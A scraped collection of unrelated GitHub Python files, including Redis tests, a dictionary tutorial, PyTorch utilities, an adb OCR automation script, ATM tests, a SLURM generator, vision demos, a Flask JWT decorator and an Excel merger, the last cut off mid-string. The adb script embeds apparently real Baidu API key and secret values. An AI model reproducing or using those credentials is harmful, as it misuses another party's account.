a good practice: it tests \"private methods\",\n# but it checks that we retry transactions and eventually give up after the maximum number of attempts.\ndef test_retry_method_works_with_cache_overwrite(monkeypatch):\n    redis_store = RedisStore(\n        redis_con,\n        TimestampRegistry(redis_con),\n        retry_backoff=lambda: 0\n    )\n    global retries\n    retries = 0\n\n    def test_cache_update(cache_entry, pipe):\n        global retries\n        retries += 1\n        redis_con.hset(cache_entry.key, \"random_key\", \"random_value\")\n\n        pipe.multi()\n        pipe.hset(cache_entry.key, \"value\", json.dumps(cache_entry.value))\n        pipe.execute()\n\n    monkeypatch.setattr(redis_store, '_update_cache_entry', test_cache_update)\n    redis_store.store(\"hello\", \"world\", 0)\n\n    assert redis_store.lookup(\"hello\").value is None\n    assert retries == 5\n\n\ndef test_retry_method_works_with_timestamp_overwrite(monkeypatch):\n    ts_registry = TimestampRegistry(redis_con)\n    redis_store = RedisStore(redis_con, ts_registry, retry_backoff=lambda: 0)\n    global retries\n    retries = 0\n\n    def test_cache_update(cache_entry, pipe):\n        global retries\n        retries += 1\n        ts_key = ts_registry.value_ts_key(cache_entry.key)\n        redis_con.set(ts_key, -500)\n\n        pipe.multi()\n        pipe.set(ts_key, 5)\n        pipe.execute()\n\n    monkeypatch.setattr(redis_store, '_update_cache_entry', test_cache_update)\n    redis_store.store(\"hello\", \"world\", 0)\n\n    assert redis_store.lookup(\"hello\").value is None\n    assert retries == 5\n","repo_name":"anderslime/smache","sub_path":"tests/smache/stores/test_redis_store.py","file_name":"test_redis_store.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"it","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
{"seq_id":"71455346932","text":"# LOOPING THROUGH ALL THE KEYS IN A DICTIONARY\n\n# The keys() method is useful when you don't need to work with all of the values in a dictionary. Let's loop through the 'favorite_languages' dictionary and print the names of everyone who took the poll:\n\nfavorite_languages = {\n    'jen': 'python',\n    'sarah': 'c',\n    'edward': 'ruby',\n    'phil': 'python',\n}\n\nfor name in favorite_languages.keys():\n    print(name.title())\n\n# Looping through keys is actually the default behavior when looping through a dictionary, so this code would have exactly the same output if you wrote:\n\nfor name in favorite_languages:\n    print(name.title())\n\n# You can choose to use the keys() method explicitly if it makes your code easier to read, or you can omit it if you wish.\n\n# You can access the value associated with a key you care about inside the loop by using the current key. Let's print a message to a couple of friends about the languages they chose. We'll loop through the names in the dictionary as we did previously, but when the name matches one of our friends, we'll display a message about their favorite language:\n\nfriends = ['phil', 'sarah']\nfor name in favorite_languages.keys():\n    print(f\"Hi {name.title()}.\")\n\n    if name in friends:\n        language = favorite_languages[name].title()\n        print(f\"\\t{name.title()}, I see you love {language}!\")\n\n# At line 24 we make a list of friends that we want to print a message to. Inside the loop, we print each person's name. Then at line 28 we check whether the 'name' we're working with is in the list of 'friends'. If it is, we determine the person's favorite language using the name of the dictionary and the current value of 'name' as the key (line 29). 
We then print a special greeting, including a reference to their language of choice.\n\n# Everyone's name should be printed, but our friends receive a special message.\n\n# You can also use the keys() method to find out if a particular person was polled. This time, let's find out if Erin took the poll:\n\nif 'erin' not in favorite_languages.keys():\n    print(\"\\nErin, please take our poll!\")","repo_name":"ctrlshftejct/pythoncc","sub_path":"2020/part1-basics/06_dictionaries/looping through a dictionary/looping_through_all_keys_in_dictionary.py","file_name":"looping_through_all_keys_in_dictionary.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"10940278734","text":"#!/bin/env python\n\nfrom argparse import ArgumentParser\n\nfrom ebi_eva_common_pyutils.logger import logging_config\n\nfrom contig_name_converter.convert_vcf_file import convert_vcf\nfrom contig_name_converter.converters import supported_conventions\n\nlogger = logging_config.get_logger(__name__)\n\n\ndef main():\n    argparse = ArgumentParser(description=\"Convert sequence/contig names from one naming convention to another using \"\n                                          \"the information stored in the accession provided in the header\")\n    argparse.add_argument('-i', '--input', help='Input file to convert')\n    argparse.add_argument('-o', '--output', help='Output file containing the converted data')\n    argparse.add_argument('-c', '--convention', help='Contig naming convention to use',\n                          choices=supported_conventions,\n                          default='enaSequenceName')\n    argparse.add_argument('-u', '--contig_alias_url', help='URL used to contact the contig alias web service',\n                          default='https://www.ebi.ac.uk/eva/webservices/contig-alias/')\n\n    args = argparse.parse_args()\n    logging_config.add_stdout_handler()\n\n    convert_vcf(args.input, args.output, target_naming_convention=args.convention,\n                contig_alias_url=args.contig_alias_url)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"EBIvariation/contig-name-converter","sub_path":"bin/convert_vcf_file.py","file_name":"convert_vcf_file.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"856894607","text":"import torch\nimport numpy as np\nimport torch.nn.functional as F\nimport torchvision\n\nfrom typing import Union, Tuple\n\ndef to_tensor(data: np.ndarray) -> torch.Tensor:\n    \"\"\"\n    Convert numpy array to PyTorch tensor.\n\n    For complex arrays, the real and imaginary parts are stacked along the last\n    dimension.\n\n    Args:\n        data: Input numpy array.\n\n    Returns:\n        PyTorch version of data.\n    \"\"\"\n    if np.iscomplexobj(data):\n        data = np.stack((data.real, data.imag), axis=-1)\n\n    return torch.from_numpy(data)\n\ndef normalize(\n    data: torch.Tensor,\n    mean: Union[float, torch.Tensor],\n    stddev: Union[float, torch.Tensor],\n    eps: Union[float, torch.Tensor] = 0.0,\n) -> torch.Tensor:\n    \"\"\"\n    Normalize the given tensor.\n\n    Applies the formula (data - mean) / (stddev + eps).\n\n    Args:\n        data: Input data to be normalized.\n        mean: Mean value.\n        stddev: Standard deviation.\n        eps: Added to stddev to prevent dividing by zero.\n\n    Returns:\n        Normalized tensor.\n    \"\"\"\n    return (data - mean) / (stddev + eps)\n\ndef normalize_instance(\n    data: torch.Tensor, eps: Union[float, torch.Tensor] = 0.0\n) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:\n    \"\"\"\n    Normalize the given tensor with instance norm.\n\n    Applies the formula (data - mean) / (stddev + 
eps), where mean and stddev\n    are computed from the data itself.\n\n    Args:\n        data: Input data to be normalized\n        eps: Added to stddev to prevent dividing by zero.\n\n    Returns:\n        Tuple of (normalized tensor, mean, std).\n    \"\"\"\n    mean = data.mean()\n    std = data.std()\n\n    return normalize(data, mean, std, eps), mean, std\n\ndef pad_size_tensor(data: torch.Tensor, mask: torch.Tensor, desired_shape: Tuple[int, int]= (512, 256)): \n    # shape: [batch, width, height, t, channels]\n    w_, h_ = desired_shape #desired shapes\n    h, w = data.shape[-3], data.shape[-4] #actual original shapes #TODO dims -3 and -4\n    h_pad, w_pad = (h_-h), (w_-w)\n    \n    if data.dim() == 4:\n        pad = (0, 0,\n               0, 0,\n               h_pad//2, h_pad//2,\n               w_pad//2, w_pad//2\n               ) \n    elif data.dim() == 5:\n        pad = (0, 0,\n               0, 0,\n               0, 0,\n               h_pad // 2, h_pad // 2,\n               w_pad // 2, w_pad // 2,\n               )\n\n    pad_4_mask = (0, 0,\n                  h_pad // 2, h_pad // 2,\n                  w_pad // 2, w_pad // 2,\n                  \n                  )\n    \n    data_padded = F.pad(data, pad, mode='constant', value=0)\n    mask_padded = F.pad(mask, pad_4_mask, mode='constant', value=0)\n    \n    # print(\"pad_size_tensor data_padded: \", data_padded.size())\n    # print(\"pad_size_tensor mask_padded: \", mask_padded.size())\n    \n    return data_padded, mask_padded\n\ndef crop_to_depad(data, metadata):\n    \n    ori_height, ori_width = metadata['height'], metadata['width'] \n    # print(ori_height, ori_width)\n    data = data.permute(0, 3, 4, 2, 1)\n    w_crop = (data.shape[-1] - ori_width) // 2\n    h_crop = (data.shape[-2] - ori_height) // 2\n    \n    data = torchvision.transforms.functional.crop(data, h_crop, w_crop, ori_height, ori_width) \n\n    return data.permute(0, 4, 3, 1, 2)\n\ndef new_crop(data, metadata):\n    ori_height, ori_width = metadata['height'], metadata['width']\n    data = data.permute(0, 1, 3, 2)\n    w_crop = (data.shape[-1] - ori_width) // 2\n    h_crop = (data.shape[-2] - ori_height) // 2\n\n    data = torchvision.transforms.functional.crop(data, h_crop, w_crop, ori_height, ori_width)\n\n    return data.permute(0, 1, 3, 2)\n","repo_name":"vios-s/CMRxRECON_Challenge_EDIPO","sub_path":"data/transform_utils.py","file_name":"transform_utils.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"5384815581","text":"# coding=utf-8\nimport os\nimport time\nimport recognition\nfrom PIL import Image\n\n# fetch the access_token\nAPI_Key = \"NXWqI8Qr0IuCMXneOGTTeAw1\"\nSecret_Key = \"HPjcoprSjTaFlHDrZp5sel8NuXcjfra4\"\naccess_token = recognition.get_token(API_Key, Secret_Key)\n\n# topics: 0: 19th Party Congress report, 1: Four Comprehensives, 2: Chinese Dream, 3: youth work, 4: stories and allusions\nnum = input('please select the topic:')\nif num == '':\n    raise RuntimeError('num is required!')\nnum = int(num)\n\nstart = input('please enter the start class:')\nif start == '':\n    raise RuntimeError('start is required!')\nstart = int(start)\n\ndef shuati():\n    os.system('adb shell screencap /sdcard/sc.png')\n    os.system('adb pull /sdcard/sc.png')\n\n    img = Image.open('sc.png')\n\n    # crop out the button and check whether its OCR'd text reads 'next'\n    next = img.crop((360, 1660, 720, 1780))\n    next.save('next.png')\n    next = recognition.recognition_word_high(r'./', 'next.png', access_token)\n    for i in next:\n        if i == '下一个':  # OCR text: 'next'\n            os.system('adb shell input tap 538 1708')\n            print('auto-playing lesson...')\n            time.sleep(6)\n            shuati()\n            break\n        elif i == '继续学习':  # OCR text: 'continue studying'\n            os.system('adb shell input tap 856 811')\n            os.system('adb shell input tap 538 1708')\n            time.sleep(5)\n            position()\n        elif i == '典故0':  # OCR text: 'allusion 0'\n            print('allusion')\n            topic()\n        else :\n            print(i)\n            time.sleep(5)\n            backToTopic()\n\n# automatically tap the topic\ndef topic():\n    global num\n    startX = 250\n    startY = 1410\n    addX = 300\n    addY = 
255\n    lastX = startX + num % 3 * addX\n    lastY = startY + int(num/3) * addY\n    os.system('adb shell input tap ' + str(lastX) + ' ' + str(lastY))\n    time.sleep(3)\n    if num<5:\n        num = num + 1\n        position()\n    else :\n        print('All lessons finished!')\n\n# automatically tap the selected lesson\ndef position():\n    global start\n    startX = 242\n    startY = 633\n    add = 118\n    lastX = startX + (start-1) % 6 * add\n    lastY = startY + int((start-1) / 6) * add\n    os.system('adb shell input tap ' + str(lastX) + ' ' + str(lastY))\n    start = start + 1\n    time.sleep(3)\n    shuati()\n\n# return to the topic screen after finishing\ndef backToTopic():\n    img = Image.open('sc.png')\n    back = img.crop((670, 1700, 980, 1790))\n    back.save('back.png')\n    back = recognition.recognition_word_high(r'./', 'back.png', access_token)\n    for i in back:\n        if i == '返回':  # OCR text: 'back'\n            print(i)\n            check1 = img.crop((530, 1075, 680, 1160))\n            check1.save('check1.png')\n            check1 = recognition.recognition_word_high(r'./', 'check1.png', access_token)\n            check2 = img.crop((770, 1090, 860, 1140))\n            check2.save('check2.png')\n            check2 = recognition.recognition_word_high(r'./', 'check2.png', access_token)\n            print(check1)\n            print(check2)\n            for check in check1:\n                if check=='确定':  # OCR text: 'confirm'\n                    os.system('adb shell input tap 600 1080')\n            for check in check2:\n                if check=='确定':  # OCR text: 'confirm'\n                    os.system('adb shell input tap 800 1120')\n            os.system('adb shell input tap 832 1740')\n            time.sleep(2)\n            global start\n            start = start - 4\n            topic()\n        else:\n            shuati()\n    \ntopic()\ntime.sleep(6)\nshuati()\n","repo_name":"ZJia1231/Demo","sub_path":"py/adb/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"17083181737","text":"import pytest\nimport atm\n\n\ndef test_should_not_access_pin_number():\n    card = atm.Card()\n    with pytest.raises(AttributeError):\n        card.__pin_number\n\n\ndef test_correct_card_check_pin_number():\n    card = atm.Card()\n    assert card.check_pin(1234) == True\n\n\ndef test_wrong_card_check_pin_number():\n    card = atm.Card()\n    assert card.check_pin(1235) == False\n\n\ndef test_should_get_account_number_by_card():\n    # Given\n    account = atm.Account()\n    account.set_account(1)\n    card = atm.Card()\n    card.connect_account(account)\n\n    # When\n    accounts = card.get_account_numbers()\n\n    # Then\n    assert accounts[0] == 1\n\n\ndef test_should_get_account_number_by_atm():\n    # Given\n    a = atm.Atm()\n    card = atm.Card()\n    a.insert_card(card)\n\n    # When\n    accounts = a.get_account_number(1234)\n\n    # Then\n    assert accounts[0] == 1\n\n\ndef test_should_select_account_using_card():\n    # Given\n    a = atm.Atm()\n    card = atm.Card()\n    a.insert_card(card)\n\n    # When\n    account = a.select_account(1)\n\n    # Then\n    assert 
account == 1\n\n\ndef test_connect_valid_account():\n    account = atm.Account()\n    card = atm.Card()\n    card.connect_account(account)\n\n\ndef test_connect_invalid_account():\n    account = atm.Atm()\n    card = atm.Card()\n    with pytest.raises(Exception):\n        card.connect_account(account)\n\n\ndef test_open_account_with_no_balance():\n    account = atm.Account()\n    assert account.get_balance() == 0\n\n\ndef test_insert_valid_card():\n    card = atm.Card()\n    a = atm.Atm()\n    a.insert_card(card)\n\n\ndef test_insert_invalid_card():\n    account = atm.Account()\n    a = atm.Atm()\n    with pytest.raises(Exception):\n        a.insert_card(account)\n\n\ndef test_input_correct_pin():\n    card = atm.Card()\n    a = atm.Atm()\n    a.insert_card(card)\n\n    assert a.input_pin(1234) == True\n\n\ndef test_see_balance():\n\n    card = atm.Card()\n    a = atm.Atm()\n    a.insert_card(card)\n\n    assert a.see_balance(1234, 1) == 0\n\n\ndef test_can_deposit_by_atm():\n    # Given\n    card = atm.Card()\n    a = atm.Atm()\n    a.insert_card(card)\n\n    # When\n    a.deposit(1234,1, 100)\n\n    # Then\n    assert a.see_balance(1234, 1) == 100\n\n\ndef test_can_withdraw_by_atm():\n    # Given\n    card = atm.Card()\n    a = atm.Atm()\n    a.insert_card(card)\n    a.deposit(1234,1, 100)\n\n    # When\n    a.withdraw(1234, 1, 100)\n\n    # Then\n    assert a.see_balance(1234, 1) == 0\n","repo_name":"yvd0301/atm","sub_path":"test_atm.py","file_name":"test_atm.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"27896319997","text":"import json\nimport pprint\nimport os\nimport sys\nimport stat\nimport pathlib\nimport suit.utils as utils\nimport math\nimport shutil\nimport pkg_resources\nimport argparse\n\ndef aices2_anynode():\n    code = \"#SBATCH -A aices2\\n\"\n    code += \"#SBATCH --cores-per-socket={cores_per_socket}\\n\"\n    code += \"#SBATCH --exclusive\\n\"\n    return code\n\ndef linuxihdc072():\n    code = \"#SBATCH -A aices2\\n\"\n    code += \"#SBATCH --nodelist=linuxihdc072\\n\"\n    code += \"#SBATCH --exclusive\\n\"\n    return code\n\n\ndef slrum_script_code(node_list,job_name,num_hours,mem,cores,commands):\n    template_path = \"suit/templates/\"\n    script = pkg_resources.resource_string(__name__,os.path.join(template_path,\"slrum_script.sh\")).decode(\"UTF-8\")\n\n    template = {}\n    template[\"node\"] = globals()[node_list]()\n    template[\"job_name\"] = job_name\n    template[\"memory\"] = mem\n    template[\"num_hours\"] = num_hours\n    template[\"cores\"] = cores\n    template[\"commands\"] = commands\n\n    code = script.format(**template)\n    return code\n\n\n\nif __name__ == \"__main__\":\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('file')\n    parser.add_argument('--slrum',dest='slrum', action='store_true')\n    params = parser.parse_args()\n\n    isSlrum = params.slrum\n    config_file = os.path.abspath(params.file)\n    if not os.path.exists(config_file):\n        print(\"config file does not exist\")\n        exit(code=-1)\n\n    with open(config_file) as f:\n        ARGS = json.load(f)\n    pprint.pprint(ARGS)\n\n    script_file_dir = os.path.join(os.path.dirname(config_file),\"scripts\")\n    if not os.path.exists(script_file_dir):\n        # shutil.rmtree(script_file_dir)\n        os.mkdir(script_file_dir)\n\n    this_script_directory = pathlib.Path(__file__).parent.absolute()\n    suit_directory = os.path.join(this_script_directory,\"suit\")\n\n\n    seed = ARGS[\"seed\"]\n    divide_runs = ARGS[\"divide_runs\"]\n    experiments_list = ARGS[\"experiments\"]\n    num_divisions = 1\n    if(divide_runs > 0):\n        num_divisions = math.ceil(len(experiments_list)/divide_runs)\n\n    method_folder = 
ARGS[\"expression_id\"]\n    exp_folder = utils.get_expressions_id(ARGS)\n    exp_folder_base = os.path.join(\"logs\",method_folder,exp_folder)\n    result_folder_name = utils.get_results_id(ARGS)\n\n    gen_code = \"\"\n    if not ARGS[\"reuse_expressions\"]:\n        gen_code = \"python3 01_generate_test_expressions.py {}\\n\".format(config_file)\n\n    for div in range(num_divisions):\n        code = \"cd {}\\n\".format(suit_directory)\n        if div==0:\n            code += gen_code\n        code += \"python3 02_generate_experiment_script.py {}\\n\".format(config_file)\n\n        sd_folder = os.path.join(exp_folder_base,\"SD\"+str(div)+\"_\"+exp_folder)\n        results_folder = os.path.join(sd_folder,result_folder_name)\n        #print(\"Results folder : \", results_folder)\n\n        code += \"cd {}\\n\".format(results_folder)\n        code += \"./runner.sh\\n\"\n\n        code += \"cd {}/\\n\".format(suit_directory)\n        code += \"python3 03_gather_results.py {}\\n\".format(results_folder)\n        #code += \"python3 04_analyse.py {}\\n\".format(results_folder)\n\n        script_file = \"SD\"+str(div)+\"_measure_\"+config_file.split(\"/\")[-1].split(\".json\")[0]+\".sh\"\n        if isSlrum:\n            script_file = \"Sl_\"+script_file\n            memory = ARGS[\"memory\"]\n            num_hours = ARGS[\"num_hours\"]\n            job_name = script_file\n            cores = ARGS[\"num_threads\"]\n            node = ARGS[\"node\"]\n            code = slrum_script_code(node,job_name, num_hours, memory, cores, code)\n\n        script_file = os.path.join(script_file_dir,script_file)\n        #print(script_file)\n        #exit(-1)\n        f = open(script_file,\"w\")\n        f.write(code)\n        f.close()\n\n        st = os.stat(script_file)\n        os.chmod(script_file,st.st_mode | stat.S_IEXEC)\n","repo_name":"as641651/Relative-Performance","sub_path":"measurements/generate_measurement_script.py","file_name":"generate_measurement_script.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"17016488394","text":"# Exercise 01\n\nplanet = {\"name\": \"Mars\", \"moons\": 2}\n\nprint(f\"{planet.get('name')} has {planet.get('moons')} moon(s)\")\n\nplanet[\"circumferences (km)\"] = {\"polar\": 6752, \"equatorial\": 6792}\n\nprint(\n    f'{planet[\"name\"]} has a polar circumference of {planet[\"circumferences (km)\"][\"polar\"]}'\n)\n\n# Exercise 02\n\nplanet_moons = {\n    \"mercury\": 0,\n    \"venus\": 0,\n    \"earth\": 1,\n    \"mars\": 2,\n    \"jupiter\": 79,\n    \"saturn\": 82,\n    \"uranus\": 27,\n    \"neptune\": 14,\n    \"pluto\": 5,\n    \"haumea\": 2,\n    \"makemake\": 1,\n    \"eris\": 1,\n}\n\nplanet_moons.pop(\"eris\")\n\nmoons = planet_moons.values()\ntotal_planets = len(planet_moons.keys())\n\nprint(f\"There are {sum(moons)} moons. 
In {total_planets} planets!\")\n\ntotal_moons = 0\nfor value in planet_moons.values():\n total_moons = total_moons + value\n\naverage_moons = total_moons / total_planets\n\nprint(f\"Each planet has an average of {average_moons} moons\")\n","repo_name":"gabrielsouzas/treinamento-python","sub_path":"dicionarios/dicionarioExe.py","file_name":"dicionarioExe.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34731959606","text":"import cv2 as cv\nimport mediapipe as mp\n\nmp_draw = mp.solutions.drawing_utils\nmp_style = mp.solutions.drawing_styles\nmp_pose = mp.solutions.pose\n\ncam = cv.VideoCapture(0)\npose = mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5)\n\nwhile cam.isOpened():\n success, image = cam.read()\n if not success:\n continue\n image.flags.writeable = False\n image = cv.cvtColor(image, cv.COLOR_BGR2RGB)\n results = pose.process(image)\n\n image.flags.writeable = True\n image = cv.cvtColor(image, cv.COLOR_RGB2BGR)\n mp_draw.draw_landmarks(image, results.pose_landmarks, mp_pose.POSE_CONNECTIONS, landmark_drawing_spec=mp_style.get_default_pose_landmarks_style())\n cv.imshow(\"Pose Track\", cv.flip(image,1))\n if cv.waitKey(5) & 0xFF == 27:\n break\ncam.release()","repo_name":"UtkarshRastogi0712/Pose-tracking","sub_path":"Pose detection.py","file_name":"Pose detection.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4128009836","text":"import numpy as np, time\n\ndef unique1(array: []):\n\tn = len(array)\n\tfor i in range(n - 1):\n\t\tfor j in range(i + 1, n):\n\t\t\tif array[i] == array[j]: return False\n\treturn True\n\ndef unique2(array: []):\n\tn = len(array)\n\tarray.sort()\n\tfor i in range(n - 1):\n\t\tif array[i] == array[i + 1]: return False\n\treturn True\n\ndef search_largest_size(function: str, min_size: int, max_size: int, time_limit=60):\n\tsize = (min_size + max_size) // 2\n\tarray = list(np.random.randint(101, size=size))\n\tif size < max_size and min_size != max_size:\n\t\tif function == 'unique1':\n\t\t\tstart = time.time()\n\t\t\tunique1(array)\n\t\t\tend = time.time()\n\t\t\telapse = end - start\n\t\t\tprint('array size: ' + str(size) + '\\telapse time: ' + str(elapse))\n\t\telif function == 'unique2':\n\t\t\tstart = time.time()\n\t\t\tunique2(array)\n\t\t\tend = time.time()\n\t\t\telapse = end - start\n\t\t\tprint('array size: ' + str(size) + '\\telapse time: ' + str(elapse))\n\t\telse:\n\t\t\tprint('invalid function name')\n\t\t\treturn\n\t\tif abs(elapse - time_limit) < .001:\n\t\t\tdel array\n\t\t\treturn size\n\t\telif elapse < time_limit:\n\t\t\tdel array\n\t\t\treturn search_largest_size(function, size + 1, max_size, time_limit)\n\t\telif elapse > time_limit:\n\t\t\tdel array\n\t\t\treturn search_largest_size(function, min_size, size - 1, time_limit)\n\treturn size\n\n# time limit can't be set too large because it is time and memory consuming.\nsize1 = search_largest_size('unique1', 0, 100000000, 1)\nsize2 = search_largest_size('unique2', 0, 10000000000, 1)","repo_name":"tanjiarui/comp254","sub_path":"lab 2/exercise 3.py","file_name":"exercise 3.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43351712302","text":"import os\nimport argparse\nimport numpy as np\nimport cv2\nimport paddle.fluid as fluid\nfrom 
paddle.fluid.core import AnalysisConfig\nfrom paddle.fluid.core import create_paddle_predictor\n\nthis_dir = os.path.split(os.path.realpath(__file__))[0]\nmodelname = \"mobilenet-ssd\"\nif modelname == \"mobilenet-ssd\":\n    input_size = 300\nelse:\n    input_size = 160\n\nCLASSES = { 0: 'background',\n            1: 'aeroplane', 2: 'bicycle', 3: 'bird', 4: 'boat',\n            5: 'bottle', 6: 'bus', 7: 'car', 8: 'cat', 9: 'chair',\n            10: 'cow', 11: 'diningtable', 12: 'dog', 13: 'horse',\n            14: 'motorbike', 15: 'person', 16: 'pottedplant',\n            17: 'sheep', 18: 'sofa', 19: 'train', 20: 'tvmonitor' }\n\ndef clip_bbox(bbox):\n    xmin = max(min(bbox[0], 1.), 0.)\n    ymin = max(min(bbox[1], 1.), 0.)\n    xmax = max(min(bbox[2], 1.), 0.)\n    ymax = max(min(bbox[3], 1.), 0.)\n    return xmin, ymin, xmax, ymax\n\ndef preprocess(img):\n    img = cv2.resize(img, (input_size, input_size)) \n    if modelname == \"mobilenet-ssd\":\n        img = (img - 127.5) * 0.007843\n    else:\n        mean = (103.94, 116.669, 123.68)\n        img = img - mean\n    img = img.transpose((2,0,1)).copy()\n    img = np.expand_dims(img,axis=0)\n    img = img.astype(\"float32\")\n    image = fluid.core.PaddleTensor(img)\n    return [image]\n    \ndef draw_result(img, out):\n    h, w, _ = img.shape\n    for dt in out:\n        if len(dt) < 5 or dt[1] < 0.5:\n            continue\n        xmin, ymin, xmax, ymax = clip_bbox(dt[2:])\n        xmin=(int)(xmin*w)\n        ymin=int(ymin*h)\n        xmax=(int)(xmax*w)\n        ymax=int(ymax*h)\n        cv2.rectangle(img,(xmin,ymin),(xmax,ymax),(0,0,255))\n        if ymin<20:\n            ymin=20\n        cv2.putText(img,CLASSES[int(dt[0])],(xmin,ymin),3,1,(255,0,0))\n    cv2.imshow(\"img\",img)\n    cv2.waitKey(1)\n\ndef test_image(predictor, imgpath):\n    img = cv2.imread(imgpath)\n    inputs = preprocess(img)\n    outputs = predictor.run(inputs)\n    output = outputs[0].as_ndarray()\n    draw_result(img, output)\n    cv2.waitKey()\n\ndef test_camera(predictor):\n    cap = cv2.VideoCapture(0)\n    while True:\n        ret, img = cap.read()\n        if not ret:\n            break\n        inputs = preprocess(img)\n        outputs = predictor.run(inputs)\n        output = outputs[0].as_ndarray()\n        draw_result(img, output)\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--model_dir\", default=this_dir+\"/\"+modelname)\n    parser.add_argument(\"--image\", default=this_dir+\"/../images/000001.jpg\")\n    return parser.parse_args()\n\nif __name__ == \"__main__\":\n    args = parse_args()\n    #model_file = args.model_dir + \"/__model__\"\n    #params_file = args.model_dir + \"/__params__\"\n    config = AnalysisConfig(args.model_dir)\n    config.disable_gpu()\n    predictor = create_paddle_predictor(config)\n    #test_image(predictor, args.image)\n    test_camera(predictor)","repo_name":"imistyrain/ssd-models","sub_path":"paddle/ssd_paddle.py","file_name":"ssd_paddle.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"21"} +{"seq_id":"8219373323","text":"from flask import (\n    request,\n    jsonify\n)\n\nimport sys\nimport jwt\nfrom config.local import config\n\nfrom functools import wraps\n\ndef authorize(f):\n    @wraps(f)\n    def decorator(*args, **kwargs):\n        token = None\n        print('authentication token: ', request.headers.get('X-ACCESS-TOKEN'))\n        if 'X-ACCESS-TOKEN' in request.headers:\n            token = request.headers['X-ACCESS-TOKEN']\n\n        if token is None:\n            return jsonify({\n                'success': False,\n                'message': 'Unauthenticated user, please provide your credentials'\n            }), 401\n        \n        try:\n            jwt.decode(token, config['SECRET_KEY'], config['ALGORYTHM'])\n            #print('\\tdecode token: ', data)\n        except Exception as e:\n            print('e: ', e)\n            print('sys.exc_info(): ', 
sys.exc_info())\n            return jsonify({\n                'success': False,\n                'message': 'Invalid Token, try a new token'\n            })\n        \n        return f(*args, **kwargs)\n    decorator.__name__ = f.__name__\n    return decorator\n","repo_name":"UTEC-CS2B01/employees-2-0-2023-1","sub_path":"backend/app/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"29747142038","text":"import tkinter as tk\r\nfrom tkinter import filedialog\r\nimport openpyxl\r\n\r\ndef read_excel_file(file_path):\r\n    workbook = openpyxl.load_workbook(file_path)\r\n    sheet = workbook.active\r\n    \r\n    dictionary = {}\r\n    \r\n    found_integer = False\r\n    \r\n    for row in sheet.iter_rows(min_row=2, values_only=True):\r\n        key = row[0]\r\n        value_c = row[2]\r\n        value_e = row[4]\r\n        \r\n        if not found_integer:\r\n            if isinstance(key, int):\r\n                found_integer = True\r\n                if key != '' and value_c != '' and value_e != '':\r\n                    dictionary[key] = {'descrizione': value_c, 'prezzo': value_e, 'nomefile': file_path}\r\n        else:\r\n            if key != '':\r\n                dictionary[key] = {'descrizione': value_c, 'prezzo': value_e, 'nomefile': file_path}\r\n    \r\n    return dictionary\r\n\r\ndef merge_and_filter_dictionaries(dict1, dict2):\r\n    common_keys = set(dict1.keys()) & set(dict2.keys())\r\n    merged_dict = {}\r\n    \r\n    for key in common_keys:\r\n        price1 = dict1[key]['prezzo'] if dict1.get(key) else None\r\n        price2 = dict2[key]['prezzo'] if dict2.get(key) else None\r\n        \r\n        if price1 is not None and price2 is not None:\r\n            if price1 < price2:\r\n                merged_dict[key] = dict1[key]\r\n            else:\r\n                merged_dict[key] = dict2[key]\r\n    \r\n    return merged_dict\r\n\r\ndef browse_file(entry):\r\n    file_path = filedialog.askopenfilename(filetypes=[('Excel Files', '*.xlsx')])\r\n    if file_path:\r\n        entry.delete(0, tk.END)\r\n        entry.insert(0, file_path)\r\n\r\ndef process_files():\r\n    file_path1 = entry_file_path1.get()\r\n    file_path2 = entry_file_path2.get()\r\n    \r\n    if file_path1 and file_path2:\r\n        dict1 = read_excel_file(file_path1)\r\n        dict2 = read_excel_file(file_path2)\r\n        \r\n        merged_dict = merge_and_filter_dictionaries(dict1, dict2)\r\n        \r\n        # Create a new Excel file\r\n        new_file = openpyxl.Workbook()\r\n        sheet = new_file.active\r\n        \r\n        # Write the data to the worksheet\r\n        sheet['A1'] = 'Key'\r\n        sheet['B1'] = 'Description'\r\n        sheet['C1'] = 'Price'\r\n        sheet['D1'] = 'File Name'\r\n        \r\n        row = 2\r\n        for key, value in merged_dict.items():\r\n            sheet.cell(row=row, column=1).value = key\r\n            sheet.cell(row=row, column=2).value = value['descrizione']\r\n            sheet.cell(row=row, column=3).value = value['prezzo']\r\n            sheet.cell(row=row, column=4).value = value['nomefile']\r\n            row += 1\r\n        \r\n        # Save the Excel file\r\n        new_file.save('merged_data.xlsx')\r\n        new_file.close()\r\n        \r\n        label_message.config(text=\"Excel file saved successfully.\")\r\n    else:\r\n        label_message.config(text=\"Please select both 